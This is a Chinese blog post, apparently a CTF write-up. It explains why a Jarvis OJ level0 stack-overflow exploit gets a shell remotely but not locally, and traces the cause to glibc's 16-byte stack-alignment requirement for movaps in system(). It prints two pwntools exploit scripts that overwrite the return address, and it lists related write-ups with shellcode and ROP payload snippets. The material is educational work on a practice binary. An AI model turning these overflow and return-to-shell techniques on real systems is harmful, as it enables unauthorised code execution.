关于jarvisOJ level0远程打得通本地打不通的问题

最新推荐文章于 2022-08-13 22:59:45 发布
最新推荐文章于 2022-08-13 22:59:45 发布
阅读量1.1k 收藏 5
点赞数 5
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fjh1997/article/details/107695261
版权

今天给学弟演示最简单的pwn题的时候居然翻车了,没想到还是这个xmm寄存器的问题,我tcl,记录一下。
原来的exp是这样。
就是很简单的调用这个callsystem
在这里插入图片描述

结果本地打不通。试了下远程,发现能打通,太奇怪了。

from pwn import*  
r=gdb.debug("./pwn_02","b* 0x00400597")  
#r=remote("52.82.121.166", 28068)
#r=process("./pwn_02")
pad=b'a'*0x88  
add=p64(0x400596)
payload=pad+add  
print(r.recv())
r.send(payload)  
r.interactive()

通过gdb调试发现,跳到这里就断了。
在这里插入图片描述
我本地调试系统是ubuntu 18,在bin群里问了问,组长肥猫嘤嘤告诉我是xmm寄存器的问题,当glibc版本大于2.27的时候,系统调用system("/bin/sh")之前有个xmm寄存器使用。要确保rsp是与16对齐的,也就是末尾必须是0.
在这里插入图片描述
在这里插入图片描述
由于xmm寄存器是128bit又用了movaps指令,故必须让rsp的地址能够整除16,解决方法就是少push一个寄存器。
在这里插入图片描述
让指令跳转到400597,本地exp如下:

from pwn import*  
r=gdb.debug("./pwn_02","b* 0x00400597")  
#r=remote("52.82.121.166", 28068)
#r=process("./pwn_02")
pad=b'a'*0x88  
add=p64(0x400597)
payload=pad+add  
print(r.recv())
r.send(payload)  
r.interactive()

使用cat /proc/version发现我的本地调试环境是ubuntu 18而jarvis oj本地的环境也是ubuntu18 那么为什么会不同呢,就是glibc版本的问题,使用

ldd --version

查看发现我的glibc版本是

ldd (Ubuntu GLIBC 2.27-3ubuntu1.2) 2.27

jarvisOJ的版本是:

ldd (Ubuntu EGLIBC 2.19-0ubuntu6.15) 2.19

看来就是libc的问题,与系统版本无关。

fjh1997
关注
解决一种pwn本地打不通远程打得通问题
fjh1997的博客
04-06 1794
最近就遇到了这样的怪题目,本地劫持指针到execve()的int 80系统调用的时候,本地会卡住,远程却可以,我的建立的shellcode是这样的: push 0x68 push 0x732f2f2f push 0x6e69622f mov ebx, esp xor ecx, ecx push 0x8 pop eax inc eax ...
pwn远程打通本地打不通的“玄学“问题解释
fa1c4的blog
09-30 2503
前言 速刷buu pwn题的时候碰到的问题, 本来配置了16/18/20三个版本虚拟机, 加上pwndocker, 基本可以涵盖各个版本环境的需求, 不过做到一个栈的题的时候发现出现了本地打不通, 远程能通的情况, 本来以为是个人的玄学体质导致的玄学bug, 搜索了解释, 才发现是另一回事 问题 查看本地glibc环境, 结果选择正确的glibc版本, 依然打不通本地 解决 参考 https://blog.csdn.net/fjh1997/article/details/107695261 得知glib
pwn system(“/bin/sh“)失败的原因
weixin_42016744的博客
01-11 2054
这里写自定义目录标题现象原因 现象 栈溢出做pwn 题跳转到system("/bin/sh")报错 打开gdb调试发现报错: 得知glibc2.27以后引入xmm寄存器, 记录程序状态, 会执行movaps指令, 要求rsp是按16字节对齐的, 所以如果payload这样写 payload = cyclic(0x20 + 8) + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr) 弹出的数据是奇数个, 本地就会报错 但是改成偶数个pop payl
linux 高版本libc虚拟机调试libc-2.23 gdb heap指令报错解决方案
yongbaoii的博客
02-09 1215
事情是这样的。 在做一个堆题,libc-2.23,我自己用的deepin是2.28,用patchelf将本地改过之后gdb.attach报错。 后来发现,只有用本机的libc,才能用debug调试,那么本机的是2.28,想调这2.23就得换个机子。 方案1是重新整个虚拟机 ubuntu16.04 就是libc-2.23的,重新整个虚拟机之后里面环境重新配一遍,然后在里面调试。 但是我们知道,虚拟机首先它比较比较笨重,开个虚拟机几分钟,而且占用内存比较大,所以我用了第二种。 方案2是起个docker 不
上一期文章说的关于PWN入门常见的问题
mumuzi的博客
07-29 3636
我要是有地方说错了一定要指出来啊嘤嘤嘤 虽然是从我自己的角度来理解的,但是估计应该大概还是有帮助的(吧)。 自己想的和群友提出来,涉及的问题有: 师傅,怎么入门pwn啊 那个canary保护机制,为什么说是覆盖低字节来得到canary,没理解到。反正就只知道是大概这种方式来得到canary plt和got是什么关系啊,为什么写payload的时候有时候在前,有时候在后,有时候又重复出现这样的,没搞懂 为什么要用puts而不用printf(他意思是ret2libc的题) 格式化字符串里的$是啥意义啊 1.
BUUCTF rip
qq_36995313的博客
10-10 387
BUUCTF rip 程序分析 国际惯例checksec一下 什么保护都没开,那么就有n多种方式来getshell,但是我们追求最简单的方法。 程序是64位的,我们用ida64打开,F5查看程序运行流程 可以一个gets函数,一个很明显的漏洞点,可以直接溢出,然后我们看一下程序里面有哪些字符串 这里有一个/bin/sh字符串,一看就知道不简单 双击字符串,可以看到/bin/sh在程序内存中的存放位置 然后右键->Xrefs graph to可以看到是哪个函数使用了这个字符串 可以看到是一
(Jarvis Oj)(Pwn) level5
Nothing
05-03 2063
(Jarvis Oj)(Pwn) level5 题目描述:mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题。附件和level3_x64的附件一样。 首先去看看这个mmap函数和mprotect函数是干啥的。 void* mmap(void* addr, size_t len, int port, int flag, int...
(Jarvis Oj)(Pwn) level0
Nothing
04-17 1210
(Jarvis Oj)(Pwn) level0 首先用checksec查一下保护。几乎没开什么保护措施。 用ida反汇编。main函数就调用了两个函数。 跟进第二个函数。 找到溢出点,同过buf缓冲区。又找到函数callsystem()。 只要控制程序返回到callsystem地址即可。找到callsystem地址。 写得脚本。 1 from pwn ...
(Jarvis Oj)(Pwn) level1
Nothing
04-18 1296
(Jarvis Oj)(Pwn) level1 首先用checksec查一下保护。几乎没开什么保护措施。关键的是NX没开,意味着栈上的数据可执行。 用ida反汇编,找到溢出点。 但这次没有找到system函数了,那么该怎么得到shell呢,发现这个函数调用了printf函数,输出了buf的地址,在结合NX保护是关闭的,那么就意味着,如果将shellcode写到buf中,函数返回时跳转...
(Jarvis Oj)(Pwn) level2(x64)
Nothing
04-19 1442
(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护,和level2一样。 反汇编,程序和32位的程序几乎一致。找到溢出点。 那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可...
Java基础学习总结(149)——日志打印是一门技术
热门推荐
科技D人生
12-31 1万+
前言: 打印日志是一门艺术,但长期被开发同学所忽视。日志就像车辆保险,没人愿意为保险付钱,但是一旦出了问题都又想有保险可用。我们打印日志的时候都很随意,可是用的时候会吐槽各种 SB 包括自己!写好每一条日志吧,与君共勉! 一、日志 1.1、日志是什么? 日志,维基百科的定义是记录服务器等电脑设备或软件的运作。日志文件提供精确的系统记录,根据日志最终定位到错误详情和根源。日志的特点是,它描述...
记一次bugku awd的pwn
z1r0的博客
03-27 2190
今天闲得没事,随便逛逛的时候看到了bugku awd有战队开了房间,想着没什么事就报名玩了玩,不过pwn题还是很有意思的。 连上去发现是个堆题。。。再一看加固时间20分钟。。。。(瞬间无语住 直接在网上找题,结果发现网上都是2.23下的,这里笔者拿到的是2.27下的(再次瞬间无语住 没办法只好自己写exp了。拿到pwn附件就是一顿瞎分析,结果发现了upadte有堆溢出 再随便翻了翻发现还有一个uaf。 只不过没有show函数而已。 再看了一下保护 脑子里瞬间想好了攻击思路,申请到malloc_hoo
BUU PWN(一)
playmaker的博客
01-28 2168
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
记一次bugku pwn题解4月27日
z1r0的博客
04-27 536
记一次bugku pwn题解4月27日 emmmm,远程环境很垃圾(2.19-0ubuntu6.15),笔者patchelf的时候才想起来没有2.19,所以直接用2.23。利用realloc调整了好多次都打不通。。。。。换了四次gadget从0一直测试到realloc+0x30。。。。(没意思,其实可以利用其他方式,比如fsop,当时想着可能马上就可以通了就没有再高兴换了。。 uaf漏洞一枚,还可以edit,直接fastbin attack乱杀。快速写完初始exp发现了一个很ganga的事情,打不通本地和
PWN-PRACTICE-BUUCTF-1
P1umH0的博客
07-04 279
PWN-PRACTICE-BUUCTF-1
攻防世界(pwn)easyfmt
PLpa的博客
03-02 1104
这题出的很奇怪,本地调试不知道为什么出问题远程也调了很久才通,希望路过的大佬提出更好的思路和解题方式! 查看一下保护: 开了canary,NX,部分打开RELRO,没开PIE,可以尝试got表的覆盖。 这里不能有时候全信,还是要打开IDA自己分析才行。 可以看到有明显的格式化字符串漏洞,看看怎么利用他。 要运行到格式化字符串漏洞,我们必须完成一个判定,我们进入CheckIn函数看看。 Ch...
持续更新 BUUCTF——PWN(一)
weixin_41748164的博客
08-13 1122
buuctf pwn
一步一步学ROP之linux_x86篇
AliMobileSecurity的博客
07-06 5659
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。虽然现在大家都在用64位的操作系统,但是想要扎实的学好ROP还是得从基础的x86系统开始。
jarvisoj_level0
最新发布
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,只是连接的地址不同。引用是一篇关于pwntools基本用法的文章,并提供了一些常用的函数和方法。根据这些引用内容,可以得出结论,jarvisoj_level0是一个存在栈溢出漏洞的程序,可以通过构造特定的payload来执行系统调用函数,从而获取shell权限。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [jarvisoj_level0](https://blog.csdn.net/weixin_56301399/article/details/125919313)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [jarvisOJ-level0](https://blog.csdn.net/qq_35661990/article/details/82889103)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [jarvis oj---level0解题方法](https://blog.csdn.net/weixin_45427676/article/details/97272924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值